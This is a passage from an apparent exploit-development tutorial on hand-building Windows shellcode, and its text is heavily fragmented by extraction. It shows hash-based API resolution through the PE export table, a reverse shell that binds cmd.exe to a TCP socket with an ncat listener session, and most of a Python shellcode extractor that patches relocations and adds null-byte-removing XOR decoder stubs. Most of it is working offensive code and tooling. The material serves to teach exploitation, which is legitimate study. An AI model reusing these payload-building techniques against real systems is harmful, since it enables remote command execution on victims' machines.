   +0x04c PatchInformation : 0x4ce7979d Void
 
   
+0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 
-
 0x0 ]
 
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 
-
 0x6830d0 ]
 
   +0x060 StaticLinks      : _LIST_E
NTRY [ 0x6830d8 
-
 0x6830d8 ]
 
   +0x068 ContextInformation : 0x00686418 Void
 
   +0x06c OriginalBase     : 0x6851a8
 
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0
 
As you can see, I’m debugging calc.exe in WinDbg! That’s right: the first module is the
 executable itself. The 
important field is 
DLLBase
 (c). Given the base address of the module, we can analyze the PE file loaded in 
memory and get all kinds of information, like the addresses of the exported functions.
 
That’s exactly what we do in 
getProcAd
drByHash
:
 
C++
 
 
.
 
    
.
 
    
.
 
    
BYTE
 
*
baseAddress
 
=
 
(
BYTE
 
*)
dte
-
>
DllBase
;
 
    
if
 
(!
baseAddress
)
           
// invalid module(???)
 
        
continue
;
 
    
IMAGE_DOS_HEADER
 
*
dosHeader
 
=
 
(
IMAGE_DOS_HEADER
 
*)
baseAddress
;
 
    
IMAGE_NT_HEADERS
 
*
ntHeaders
 
=
 
(
IM
AGE_NT_HEADERS
 
*)(
baseAddress
 
+
 
dosHeader
-
>
e_lfanew
);
 
    
DWORD
 
iedRVA
 
=
 
ntHeaders
-
>
OptionalHeader
.
DataDirectory
[
IMAGE_DIRECTORY_ENTRY_EXPORT
].
VirtualAddress
;
 
    
if
 
(!
iedRVA
)
                
// Export Directory not present
 
        
continue
;
 
    
IMAGE_EXPOR
T_DIRECTORY
 
*
ied
 
=
 
(
IMAGE_EXPORT_DIRECTORY
 
*)(
baseAddress
 
+
 
iedRVA
);
 
    
char
 
*
moduleName
 
=
 
(
char
 
*)(
baseAddress
 
+
 
ied
-
>
Name
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 59 
-
 
    
DWORD
 
moduleHash
 
=
 
getHash
(
moduleName
);
 
 
// The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in par
allel, i.e. the i
-
th
 
    
// element of both arrays refer to the same function. The first array specifies the name whereas
 
    
// the second the ordinal. This ordinal can then be used as an index in the array pointed to by
 
    
// AddressOfFunctions to find 
the entry point of the function.
 
    
DWORD
 
*
nameRVAs
 
=
 
(
DWORD
 
*)(
baseAddress
 
+
 
ied
-
>
AddressOfNames
);
 
    
for
 
(
DWORD
 
i
 
=
 
0
;
 
i
 
<
 
ied
-
>
NumberOfNames
;
 
++
i
)
 
{
 
        
char
 
*
functionName
 
=
 
(
char
 
*)(
baseAddress
 
+
 
nameRVAs
[
i
]);
 
        
if
 
(
hash
 
==
 
moduleHash
 
+
 
get
Hash
(
functionName
))
 
{
 
            
WORD
 
ordinal
 
=
 
((
WORD
 
*)(
baseAddress
 
+
 
ied
-
>
AddressOfNameOrdinals
))[
i
];
 
            
DWORD
 
functionRVA
 
=
 
((
DWORD
 
*)(
baseAddress
 
+
 
ied
-
>
AddressOfFunctions
))[
ordinal
];
 
            
return
 
baseAddress
 
+
 
functionRVA
;
 
        
}
 
 
}
 
    
.
 
    
.
 
    
To understand this piece of code you’ll need to have a look at the PE file format specification. I won’t go into 
too many details. One important thing you should know is that many (if not all) the addresses in the PE file 
structures 
are 
RVA
 (
R
elative 
V
irtual 
A
ddresses), i.e. addresses relative to the base address of the PE 
module (DllBase). For example, if the RVA is 100h and DllBase is 400000h, then the RVA points to data at 
the address 400000h + 100h = 400100h.
 
The module starts wit
h the so called 
DOS_HEADER
 which contains a RVA (
e_lfanew
) to the 
NT_HEADERS
 
which are the 
FILE_HEADER
 and the 
OPTIONAL_HEADER
. The 
OPTIONAL_HEADER
 contains an array 
called 
DataDirectory
 which points to various “directories” of the PE module. We are intere
sted in the 
Export 
Directory
.
 
The C structure associated with the Export Directory is defined as follows:
 
C++
 
 
typedef
 
struct
 
_IMAGE_EXPORT_DIRECTORY
 
{
 
    
DWORD
   
Characteristics
;
 
    
DWORD
   
TimeDateStamp
;
 
    
WORD
    
MajorVersion
;
 
    
WORD
    
MinorVersi
on
;
 
    
DWORD
   
Name
;
 
    
DWORD
   
Base
;
 
    
DWORD
   
NumberOfFunctions
;
 
    
DWORD
   
NumberOfNames
;
 
    
DWORD
   
AddressOfFunctions
;
     
// RVA from base of image
 
    
DWORD
   
AddressOfNames
;
         
// RVA from base of image
 
    
DWORD
   
AddressOfNameOrdinals
;
  
// RVA from base of image
 
}
 
IMAGE_EXPORT_DIRECTORY
,
 
*
PIMAGE_EXPORT_DIRECTORY
;
 
 
The field 
Name
 is a RVA to a string containing the name of the module. Then there are 5 important fields:
 

 
NumberOfFunctions
:
 
number of elements in AddressOfFunctions.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 60 
-
 

 
NumberOf
Names
:
 
number of elements in AddressOfNames.
 

 
AddressOfFunctions
:
 
RVA to an array of RVAs (DWORDs) to the entrypoints of the exported functions.
 

 
AddressOfNames
:
 
RVA to an array of RVAs (DWORDs) to the names of the exported functions.
 

 
AddressOfNameOrdinals
:
 
RVA to an array of ordinals (WORDs) associated with the exported functions.
 
As the comments in the C/C++ code say, the arrays pointed to by 
AddressOfNames
 and 
AddressOfNameOrdinals
 run in parallel:
 
 
While the first two arrays run in parallel, the third doesn’t and the ordinals taken from 
AddressOfNameOrdinals
 are indices in the array 
AddressOfFunctions
.
 
So the idea is to first find th
e right name in 
AddressOfNames
, then get the corresponding ordinal in 
AddressOfNameOrdinals
 (at the same position) and finally use the ordinal as index in 
AddressOfFunctions
 
to get the RVA of the corresponding exported function.
 
DefineFuncPtr
 
DefineFuncPtr
 is a handy macro which helps define a pointer to an imported function. Here’s an example:
 
C++
 
 
#define HASH_WSAStartup           0x2ddcd540
 
 
#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
 
DefineFuncPtr
(
WSAStartup
);
 
 
WSAStartup
 is a function imported from 
ws2_32.dll
, so 
HASH_WSAStartup
 is computed this way:
 
C++
 
 
DWORD
 
hash
 
=
 
getFunctionHash
(
"ws2_32.dll"
,
 
"WSAStartup"
);
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 61 
-
 
When the macro is expanded,
 
C++
 
 
DefineFuncPtr
(
WSAStartup
);
 
 
becomes
 
C++
 
 
decltype
(
WSAStartup
)
 
*
My_WSAStartup
 
=
 
(
decltype
(
WSAStartup
)
 
*)
getProcAddrByHash
(
HASH_WSAStartup
)
 
 
where 
decltype(WSAStartup)
 is the type of the function 
WSAStartup
. This way we don’t need to redefine the 
function prototype. Note that 
decltype
 was introdu
ced in C++11.
 
Now we can call 
WSAStartup
 through 
My_WSAStartup
 and intellisense will work perfectly.
 
Note that before importing a function from a module, we need to make sure that that module is already 
loaded in memory. While 
kernel32.dll
 and 
ntdll.dll
 ar
e always present (lucky for us), we can’t assume that 
other modules are. The easiest way to load a module is to use 
LoadLibrary
:
 
C++
 
 
DefineFuncPtr
(
LoadLibraryA
);
 
  
My_LoadLibraryA
(
"ws2_32.dll"
);
 
 
This works because 
LoadLibrary
 is imported from 
kernel32.
dll
 that, as we said, is always present in memory.
 
We could also import 
GetProcAddress
 and use it to get the address of all the other function we need, but 
that would be wasteful because we would need to include the full names of the functions in the shell
code.
 
entryPoint
 
entryPoint
 is obviously the entry point of our shellcode and implements the reverse shell. First, we import all 
the functions we need and then we use them. The details are not important and I must say that the winsock 
API are very cumberso
me to use.
 
In a nutshell:
 
1
.
 
we create a socket,
 
2
.
 
connect the socket to 127.0.0.1:123,
 
3
.
 
create a process by executing cmd.exe,
 
4
.
 
attach the socket to the standard input, output and error of the process,
 
5
.
 
wait for the process to terminate,
 
6
.
 
when the process has ende
d, we terminate the current thread.
 
Point 3 and 4 are performed at the same time with a call to CreateProcess. Thanks to 4), the attacker can 
listen on port 123 for a connection and then, once connected, can interact with cmd.exe running on the 
remote mach
ine through the socket, i.e. the TCP connection.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 62 
-
 
To try this out, install ncat (
download
), run cmd.exe and at the prompt enter
 
ncat 
-
lvp 123
 
This will start listening on port 123.
 
Then, back in Visual Studio 2013, sele
ct 
Release
, build the project and run it.
 
Go back to ncat and you should see something like the following:
 
Microsoft Windows [Version 6.1.7601]
 
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
 
C:
\
Users
\
Kiuhnm>ncat 
-
lvp 123
 
Ncat: Version 6.4
7 ( http://nmap.org/ncat )
 
Ncat: Listening on :::123
 
Ncat: Listening on 0.0.0.0:123
 
Ncat: Connection from 127.0.0.1.
 
Ncat: Connection from 127.0.0.1:4409.
 
Microsoft Windows [Version 6.1.7601]
 
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
 
C:
\
Users
\
Kiuhnm
\
documents
\
visual studio 2013
\
Projects
\
shellcode
\
shellcode>
 
Now you can type whatever command you want. To exit, type 
exit
.
 
main
 
Thanks to the linker option
 
Function Order
: function_order.txt
 
where the first and only line of function_order.
txt is 
?entryPoint@@YAHXZ
, the function 
entryPoint
 will be 
positioned first in our shellcode. This is what we want.
 
It seems that the linker honors the order of the functions in the source code, so we could have put 
entryPoint
 
before any other function, bu
t I didn’t want to mess things up. The main function comes last in the source 
code so it’s linked at the end of our shellcode. This allows us to tell where the shellcode ends. We’ll see how 
in a moment when we talk about the map file.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 63 
-
 
Python script
 
Introdu
ction
 
Now that the executable containing our shellcode is ready, we need a way to extract and fix the shellcode. 
This won’t be easy. I wrote a Python script that
 
1
.
 
extracts the shellcode
 
2
.
 
handles the relocations for the strings
 
3
.
 
fixes the shellcode by removing
 null bytes
 
By the way, you can use whatever you like, but I like and use 
PyCharm
 (
download
).
 
The script weighs only 392 LOC, but it’s a little tricky so I’ll explain it in detail.
 
Here’s the code:
 
Python
 
 
# Shellcode extractor by Massimiliano Tomassoli (2015)
 
 
import
 
sys
 
import
 
os
 
import
 
datetime
 
import
 
pefile
 
 
author
 
=
 
'Massimiliano Tomassoli'
 
year
 
=
 
datetime
.
date
.
today
().
year
 
 
def
 
dword_to_bytes
(
value
):
 
    
return
 
[
value
 
&
 
0xff
,
 
(
value
 
>>
 
8
)
 
&
 
0xff
,
 
(
value
 
>>
 
16
)
 
&
 
0xff
,
 
(
value
 
>>
 
24
)
 
&
 
0xff
]
 
 
def
 
bytes_to_dword
(
bytes
):
 
    
return
 
(
bytes
[
0
]
 
&
 
0xff
)
 
|
 
((
bytes
[
1
]
 
&
 
0xff
)
 
<<
 
8
)
 
|
 
\
 
           
((
bytes
[
2
]
 
&
 
0xff
)
 
<<
 
16
)
 
|
 
((
bytes
[
3
]
 
&
 
0xff
)
 
<<
 
24
)
 
 
def
 
get_cstring
(
data
,
 
offset
):
 
    
'''
 
    Extracts
 a C string (i.e. null
-
terminated string) from data starting from offset.
 
    '''
 
    
pos
 
=
 
data
.
find
(
'
\
0'
,
 
offset
)
 
    
if
 
pos
 
==
 
-
1
:
 
        
return
 
None
 
    
return
 
data
[
offset
:
pos
+
1
]
 
 
def
 
get_shellcode_len
(
map_file
):
 
    
'''
 
    Gets the length of the 
shellcode by analyzing map_file (map produced by VS 2013)
 
    '''
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 64 
-
 
    
try
:
 
        
with
 
open
(
map_file
,
 
'r'
)
 
as
 
f
:
 
            
lib_object
 
=
 
None
 
            
shellcode_len
 
=
 
None
 
            
for
 
line
 
in
 
f
:
 
                
parts
 
=
 
line
.
split
()
 
               
if
 
lib_object
 
is
 
not
 
None
:
 
                    
if
 
parts
[
-
1
]
 
==
 
lib_object
:
 
                        
raise
 
Exception
(
'_main is not the last function of %s'
 
%
 
lib_object
)
 
                    
else
:
 
                        
break
 
                
elif
 
(
len
(
parts
)
 
>
 
2
 
and
 
parts
[
1
]
 
==
 
'_main'
):
 
                    
# Format:
 
                    
# 0001:00000274  _main   00401274 f   shellcode.obj
 
                    
shellcode_len
 
=
 
int
(
parts
[
0
].
split
(
':'
)[
1
],
 
16
)
 
                    
lib_object
 
=
 
parts
[
-
1
]
 
 
if
 
shellcode_len
 
is
 
None
:
 
                
raise
 
Exception
(
'Cannot determine shellcode length'
)
 
    
except
 
IOError
:
 
        
print
(
'[!] get_shellcode_len: Cannot open "%s"'
 
%
 
map_file
)
 
        
return
 
None
 
    
except
 
Exception
 
as
 
e
:
 
        
print
(
'[!] get_
shellcode_len: %s'
 
%
 
e
.
message
)
 
        
return
 
None
 
 
return
 
shellcode_len
 
 
def
 
get_shellcode_and_relocs
(
exe_file
,
 
shellcode_len
):
 
    
'''
 
    Extracts the shellcode from the .text section of the file exe_file and the string
 
    relocations.
 
    Ret
urns the triple (shellcode, relocs, addr_to_strings).
 
    '''
 
    
try
:
 
        
# Extracts the shellcode.
 
        
pe
 
=
 
pefile
.
PE
(
exe_file
)
 
        
shellcode
 
=
 
None
 
        
rdata
 
=
 
None
 
        
for
 
s
 
in
 
pe
.
sections
:
 
            
if
 
s
.
Name
 
==
 
'.text
\
0
\
0
\
0'
:
 
  
if
 
s
.
SizeOfRawData
 
<
 
shellcode_len
:
 
                    
raise
 
Exception
(
'.text section too small'
)
 
                
shellcode_start
 
=
 
s
.
VirtualAddress
 
                
shellcode_end
 
=
 
shellcode_start
 
+
 
shellcode_len
 
                
shellcode
 
=
 
pe
.
get_data
(
s
.
VirtualAddress
,
 
shellcode_len
)
 
            
elif
 
s
.
Name
 
==
 
'.rdata
\
0
\
0'
:
 
                
rdata_start
 
=
 
s
.
VirtualAddress
 
                
rdata_end
 
=
 
rdata_start
 
+
 
s
.
Misc_VirtualSize
 
                
rdata
 
=
 
pe
.
get_data
(
rdata_start
,
 
s
.
Misc_Virtua
lSize
)
 
 
if
 
shellcode
 
is
 
None
:
 
            
raise
 
Exception
(
'.text section not found'
)
 
        
if
 
rdata
 
is
 
None
:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 65 
-
 
            
raise
 
Exception
(
'.rdata section not found'
)
 
 
# Extracts the relocations for the shellcode and the referenced string
s in .rdata.
 
        
relocs
 
=
 
[]
 
        
addr_to_strings
 
=
 
{}
 
        
for
 
rel_data
 
in
 
pe
.
DIRECTORY_ENTRY_BASERELOC
:
 
            
for
 
entry
 
in
 
rel_data
.
entries
[:
-
1
]:
         
# the last element's rvs is the base_rva (why?)
 
                
if
 
shellcode_start
 
<
=
 
entry
.
rva
 
<
 
shellcode_end
:
 
                    
# The relocation location is inside the shellcode.
 
                    
relocs
.
append
(
entry
.
rva
 
-
 
shellcode_start
)
      
# offset relative to the start of shellcode
 
                    
string_va
 
=
 
pe
.
get_dword
_at_rva
(
entry
.
rva
)
 
                    
string_rva
 
=
 
string_va
 
-
 
pe
.
OPTIONAL_HEADER
.
ImageBase
 
                    
if
 
string_rva
 
<
 
rdata_start
 
or
 
string_rva
 
>=
 
rdata_end
:
 
                        
raise
 
Exception
(
'shellcode references a section other than .rda
ta'
)
 
                    
str
 
=
 
get_cstring
(
rdata
,
 
string_rva
 
-
 
rdata_start
)
 
                    
if
 
str
 
is
 
None
:
 
                        
raise
 
Exception
(
'Cannot extract string from .rdata'
)
 
                    
addr_to_strings
[
string_va
]
 
=
 
str
 
 
retu
rn
 
(
shellcode
,
 
relocs
,
 
addr_to_strings
)
 
 
except
 
WindowsError
:
 
        
print
(
'[!] get_shellcode: Cannot open "%s"'
 
%
 
exe_file
)
 
        
return
 
None
 
    
except
 
Exception
 
as
 
e
:
 
        
print
(
'[!] get_shellcode: %s'
 
%
 
e
.
message
)
 
        
return
 
None
 
 
def
 
dword_to_string
(
dword
):
 
    
return
 
''
.
join
([
chr
(
x
)
 
for
 
x
 
in
 
dword_to_bytes
(
dword
)])
 
 
def
 
add_loader_to_shellcode
(
shellcode
,
 
relocs
,
 
addr_to_strings
):
 
    
if
 
len
(
relocs
)
 
==
 
0
:
 
        
return
 
shellcode
                
# there are no relocations
 
 
# Th
e format of the new shellcode is:
 
    
#       call    here
 
    
#   here:
 
    
#       ...
 
    
#   shellcode_start:
 
    
#       <shellcode>         (contains offsets to strX (offset are from "here" label))
 
    
#   relocs:
 
    
#       off1|off2|...       (off
sets to relocations (offset are from "here" label))
 
    
#       str1|str2|...
 
 
delta
 
=
 
21
                                      
# shellcode_start 
-
 here
 
 
# Builds the first part (up to and not including the shellcode).
 
    
x
 
=
 
dword_to_bytes
(
delta
 
+
 
len
(
shellcode
))
 
    
y
 
=
 
dword_to_bytes
(
len
(
relocs
))
 
    
code
 
=
 
[
 
        
0xE8
,
 
0x00
,
 
0x00
,
 
0x00
,
 
0x00
,
               
#   CALL here
 
                                                    
# here:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 66 
-
 
        
0x5E
,
                                       
#   POP ES
I
 
        
0x8B
,
 
0xFE
,
                                 
#   MOV EDI, ESI
 
        
0x81
,
 
0xC6
,
 
x
[
0
],
 
x
[
1
],
 
x
[
2
],
 
x
[
3
],
         
#   ADD ESI, shellcode_start + len(shellcode) 
-
 here
 
        
0xB9
,
 
y
[
0
],
 
y
[
1
],
 
y
[
2
],
 
y
[
3
],
               
#   MOV ECX, len(relocs)
 
   
0xFC
,
                                       
#   CLD
 
                                                    
# again:
 
        
0xAD
,
                                       
#   LODSD
 
        
0x01
,
 
0x3C
,
 
0x07
,
                           
#   ADD [EDI+EAX], EDI
 
 
0xE2
,
 
0xFA
                                  
#   LOOP again
 
                                                    
# shellcode_start:
 
    
]
 
 
# Builds the final part (offX and strX).
 
    
offset
 
=
 
delta
 
+
 
len
(
shellcode
)
 
+
 
len
(
relocs
)
 
*
 
4
           
# 
offset from "here" label
 
    
final_part
 
=
 
[
dword_to_string
(
r
 
+
 
delta
)
 
for
 
r
 
in
 
relocs
]
 
    
addr_to_offset
 
=
 
{}
 
    
for
 
addr
 
in
 
addr_to_strings
.
keys
():
 
        
str
 
=
 
addr_to_strings
[
addr
]
 
        
final_part
.
append
(
str
)
 
        
addr_to_offset
[
addr
]
 
=
 
offset
 
        
offset
 
+=
 
len
(
str
)
 
 
# Fixes the shellcode so that the pointers referenced by relocs point to the
 
    
# string in the final part.
 
    
byte_shellcode
 
=
 
[
ord
(
c
)
 
for
 
c
 
in
 
shellcode
]
 
    
for
 
off
 
in
 
relocs
:
 
        
addr
 
=
 
bytes_to_dword
(
byte_shellco
de
[
off
:
off
+
4
])
 
        
byte_shellcode
[
off
:
off
+
4
]
 
=
 
dword_to_bytes
(
addr_to_offset
[
addr
])
 
 
return
 
''
.
join
([
chr
(
b
)
 
for
 
b
 
in
 
(
code
 
+
 
byte_shellcode
)])
 
+
 
''
.
join
(
final_part
)
 
 
def
 
dump_shellcode
(
shellcode
):
 
    
'''
 
    Prints shellcode in C format ('
\
x12
\
x23...')
 
    '''
 
    
shellcode_len
 
=
 
len
(
shellcode
)
 
    
sc_array
 
=
 
[]
 
    
bytes_per_row
 
=
 
16
 
    
for
 
i
 
in
 
range
(
shellcode_len
):
 
        
pos
 
=
 
i
 
%
 
bytes_per_row
 
        
str
 
=
 
''
 
        
if
 
pos
 
==
 
0
:
 
            
str
 
+=
 
'"'
 
        
str
 
+=
 
'
\
\
x%02x'
 
%
 
ord
(
she
llcode
[
i
])
 
        
if
 
i
 
==
 
shellcode_len
 
-
 
1
:
 
            
str
 
+=
 
'";
\
n'
 
        
elif
 
pos
 
==
 
bytes_per_row
 
-
 
1
:
 
            
str
 
+=
 
'"
\
n'
 
        
sc_array
.
append
(
str
)
 
    
shellcode_str
 
=
 
''
.
join
(
sc_array
)
 
    
print
(
shellcode_str
)
 
 
def
 
get_xor_values
(
value
):
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 67 
-
 
    
'''
 
    Finds x and y such that:
 
    1) x xor y == value
 
    2) x and y doesn't contain null bytes
 
    Returns x and y as arrays of bytes starting from the lowest significant byte.
 
    '''
 
 
# Finds a non
-
null missing bytes.
 
    
bytes
 
=
 
dword_to
_bytes
(
value
)
 
    
missing_byte
 
=
 
[
b
 
for
 
b
 
in
 
range
(
1
,
 
256
)
 
if
 
b
 
not
 
in
 
bytes
][
0
]
 
 
xor1
 
=
 
[
b
 
^
 
missing_byte
 
for
 
b
 
in
 
bytes
]
 
    
xor2
 
=
 
[
missing_byte
]
 
*
 
4
 
    
return
 
(
xor1
,
 
xor2
)
 
 
def
 
get_fixed_shellcode_single_block
(
shellcode
):
 
    
'''
 
    Returns a
 version of shellcode without null bytes or None if the
 
    shellcode can't be fixed.
 
    If this function fails, use get_fixed_shellcode().
 
    '''
 
 
# Finds one non
-
null byte not present, if any.
 
    
bytes
 
=
 
set
([
ord
(
c
)
 
for
 
c
 
in
 
shellcode
])
 
    
missi
ng_bytes
 
=
 
[
b
 
for
 
b
 
in
 
range
(
1
,
 
256
)
 
if
 
b
 
not
 
in
 
bytes
]
 
    
if
 
len
(
missing_bytes
)
 
==
 
0
:
 
        
return
 
None
                             
# shellcode can't be fixed
 
    
missing_byte
 
=
 
missing_bytes
[
0
]
 
 
(
xor1
,
 
xor2
)
 
=
 
get_xor_values
(
len
(
shellcode
))
 
 
code
 
=
 
[
 
        
0xE8
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
                       
#   CALL $ + 4
 
                                                            
# here:
 
        
0xC0
,
                                               
#   (FF)C0 = INC EAX
 
        
0x5F
,
         
                                      
#   POP EDI
 
        
0xB9
,
 
xor1
[
0
],
 
xor1
[
1
],
 
xor1
[
2
],
 
xor1
[
3
],
           
#   MOV ECX, <xor value 1 for shellcode len>
 
        
0x81
,
 
0xF1
,
 
xor2
[
0
],
 
xor2
[
1
],
 
xor2
[
2
],
 
xor2
[
3
],
     
#   XOR ECX, <xor value 2 for shellcode l
en>
 
        
0x83
,
 
0xC7
,
 
29
,
                                     
#   ADD EDI, shellcode_begin 
-
 here
 
        
0x33
,
 
0xF6
,
                                         
#   XOR ESI, ESI
 
        
0xFC
,
                                               
#   CLD
 
           
# loop1:
 
        
0x8A
,
 
0x07
,
                                         
#   MOV AL, BYTE PTR [EDI]
 
        
0x3C
,
 
missing_byte
,
                                 
#   CMP AL, <missing byte>
 
        
0x0F
,
 
0x44
,
 
0xC6
,
                                   
#   CMOVE EAX, ESI
 
        
0xAA
,
                                               
#   STOSB
 
        
0xE2
,
 
0xF6
                                          
#   LOOP loop1
 
                                                        
# shellcode_begin:
 
    
]
 
 
return
 
''
.
join
([
chr
(
x
)
 
for
 
x
 
in
 
code
])
 
+
 
shellcode
.
replace
(
'
\
0'
,
 
chr
(
missing_byte
))
 
 
def
 
get_fixed_shellcode
(
shellcode
):
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 68 
-
 
    
'''
 
    Returns a version of shellcode without null bytes. This version divides
 
    the shell
code into multiple blocks and should be used only if
 
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
 
    '''
 
 
# The format of bytes_blocks is
 
    
#   [missing_byte1, number_of_blocks1,
 
    
#    missing_byte2, number_of_blocks2
, ...]
 
    
# where missing_byteX is the value used to overwrite the null bytes in the
 
    
# shellcode, while number_of_blocksX is the number of 254
-
byte blocks where
 
    
# to use the corresponding missing_byteX.
 
    
bytes_blocks
 
=
 
[]
 
    
shellcode_len
 
=
 
le
n
(
shellcode
)
 
    
i
 
=
 
0
 
    
while
 
i
 
<
 
shellcode_len
:
 
        
num_blocks
 
=
 
0
 
        
missing_bytes
 
=
 
list
(
range
(
1
,
 
256
))
 
 
# Tries to find as many 254
-
byte contiguous blocks as possible which misses at
 
        
# least one non
-
null value. Note that a 
single 254
-
byte block always misses at
 
        
# least one non
-
null value.
 
        
while
 
True
:
 
            
if
 
i
 
>=
 
shellcode_len
 
or
 
num_blocks
 
==
 
255
:
 
                
bytes_blocks
 
+=
 
[
missing_bytes
[
0
],
 
num_blocks
]
 
                
break
 
            
bytes
 
=
 
set
([
ord
(
c
)
 
for
 
c
 
in
 
shellcode
[
i
:
i
+
254
]])
 
            
new_missing_bytes
 
=
 
[
b
 
for
 
b
 
in
 
missing_bytes
 
if
 
b
 
not
 
in
 
bytes
]
 
            
if
 
len
(
new_missing_bytes
)
 
!=
 
0
:
         
# new block added
 
                
missing_bytes
 
=
 
new_missing_bytes
 
                
n
um_blocks
 
+=
 
1
 
                
i
 
+=
 
254
 
            
else
:
 
                
bytes
 
+=
 
[
missing_bytes
[
0
],
 
num_blocks
]
 
                
break
 
 
if
 
len
(
bytes_blocks
)
 
>
 
0x7f
 
-
 
5
:
 
        
# Can't assemble "LEA EBX, [EDI + (bytes
-
here)]" or "JMP skip_bytes".
 
   
return
 
None
 
 
(
xor1
,
 
xor2
)
 
=
 
get_xor_values
(
len
(
shellcode
))
 
 
code
 
=
 
([
 
        
0xEB
,
 
len
(
bytes_blocks
)]
 
+
                          
#   JMP SHORT skip_bytes
 
                                                            
# bytes:
 
        
bytes_blo
cks
 
+
 
[
                                    
#   ...
 
                                                            
# skip_bytes:
 
        
0xE8
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
                       
#   CALL $ + 4
 
                                                        
# here:
 
        
0xC0
,
                                               
#   (FF)C0 = INC EAX
 
        
0x5F
,
                                               
#   POP EDI
 
        
0xB9
,
 
xor1
[
0
],
 
xor1
[
1
],
 
xor1
[
2
],
 
xor1
[
3
],
           
#   MOV ECX, <xor value 1 for s
hellcode len>
 
        
0x81
,
 
0xF1
,
 
xor2
[
0
],
 
xor2
[
1
],
 
xor2
[
2
],
 
xor2
[
3
],
     
#   XOR ECX, <xor value 2 for shellcode len>
 
        
0x8D
,
 
0x5F
,
 
-
(
len
(
bytes_blocks
)
 
+
 
5
)
 
&
 
0xFF
,
        
#   LEA EBX, [EDI + (bytes 
-
 here)]
 
        
0x83
,
 
0xC7
,
 
0x30
,
                
                   
#   ADD EDI, shellcode_begin 
-
 here
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 69 
-
 
                                                            
# loop1:
 
        
0xB0
,
 
0xFE
,
                                         
#   MOV AL, 0FEh
 
        
0xF6
,
 
0x63
,
 
0x01
,
                              
     
#   MUL AL, BYTE PTR [EBX+1]
 
        
0x0F
,
 
0xB7
,
 
0xD0
,
                                   
#   MOVZX EDX, AX
 
        
0x33
,
 
0xF6
,
                                         
#   XOR ESI, ESI
 
        
0xFC
,
                                               
#   CLD
 
                                                            
# loop2:
 
        
0x8A
,
 
0x07
,
                                         
#   MOV AL, BYTE PTR [EDI]
 
        
0x3A
,
 
0x03
,
                                         
#   CMP AL, BYTE PTR [EBX]
 
        
0x0F
,
 
0x44
,
 
0xC6
,
                                   
#   CMOVE EAX, ESI
 
        
0xAA
,
                                               
#   STOSB
 
        
0x49
,
                                               
#   DEC ECX
 
        
0x74
,
 
0x07
,
                            
             
#   JE shellcode_begin
 
        
0x4A
,
                                               
#   DEC EDX
 
        
0x75
,
 
0xF2
,
                                         
#   JNE loop2
 
        
0x43
,
                                               
#   INC EBX
 
  
0x43
,
                                               
#   INC EBX
 
        
0xEB
,
 
0xE3
                                          
#   JMP loop1
 
                                                            
# shellcode_begin:
 
    
])
 
 
new_shellcode_pieces
 
=
 
[]
 
    
pos
 
=
 
0
 
    
for
 
i
 
in
 
range
(
len
(
bytes_blocks
)
 
/
 
2
):
 
        
missing_char
 
=
 
chr
(
bytes_blocks
[
i
*
2
])
 
        
num_bytes
 
=
 
254
 
*
 
bytes_blocks
[
i
*
2
 
+
 
1
]
 
        
new_shellcode_pieces
.
append
(
shellcode
[
pos
:
pos
+
num_bytes
].
replace
(
'
\
0'
,
 
missing_char
))
 
       
pos
 
+=
 
num_bytes
 
 
return
 
''
.
join
([
chr
(
x
)
 
for
 
x
 
in
 
code
])
 
+
 
''
.
join
(
new_shellcode_pieces
)
 
 
def
 
main
():
 
    
print
(
"Shellcode Extractor by %s (%d)
\
n"
 
%
 
(
author
,
 
year
))
 
 
if
 
len
(
sys
.
argv
)
 
!=
 
3
:
 
        
print
(
'Usage:
\
n'
 
+
 
              
'  %s <exe f
ile> <map file>
\
n'
 
%
 
os
.
path
.
basename
(
sys
.
argv
[
0
]))
 
        
return
 
 
exe_file
 
=
 
sys
.
argv
[
1
]
 
    
map_file
 
=
 
sys
.
argv
[
2
]
 
 
print
(
'Extracting shellcode length from "%s"...'
 
%
 
os
.
path
.
basename
(
map_file
))
 
    
shellcode_len
 
=
 
get_shellcode_len
(
map_file
)
 
    
if
 
shellcode_len
 
is
 
None
:
 
        
return
 
    
print
(
'shellcode length: %d'
 
%
 
shellcode_len
)
 
 
print
(
'Extracting shellcode from "%s" and analyzing relocations...'
 
%
 
os
.
path
.
basename
(
exe_file
))
 
    
result
 
=
 
get_shellcode_and_relocs
(
exe_file
,
 
shellcode
_len
)
 
    
if
 
result
 
is
 
None
:
 
        
return
 
    
(
shellcode
,
 
relocs
,
 
addr_to_strings
)
 
=
 
result
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 70 
-
 
    
if
 
len
(
relocs
)
 
!=
 
0
:
 
        
print
(
'Found %d reference(s) to %d string(s) in .rdata'
 
%
 
(
len
(
relocs
),
 
len
(
addr_to_strings
)))
 
        
print
(
'Strings:'
)
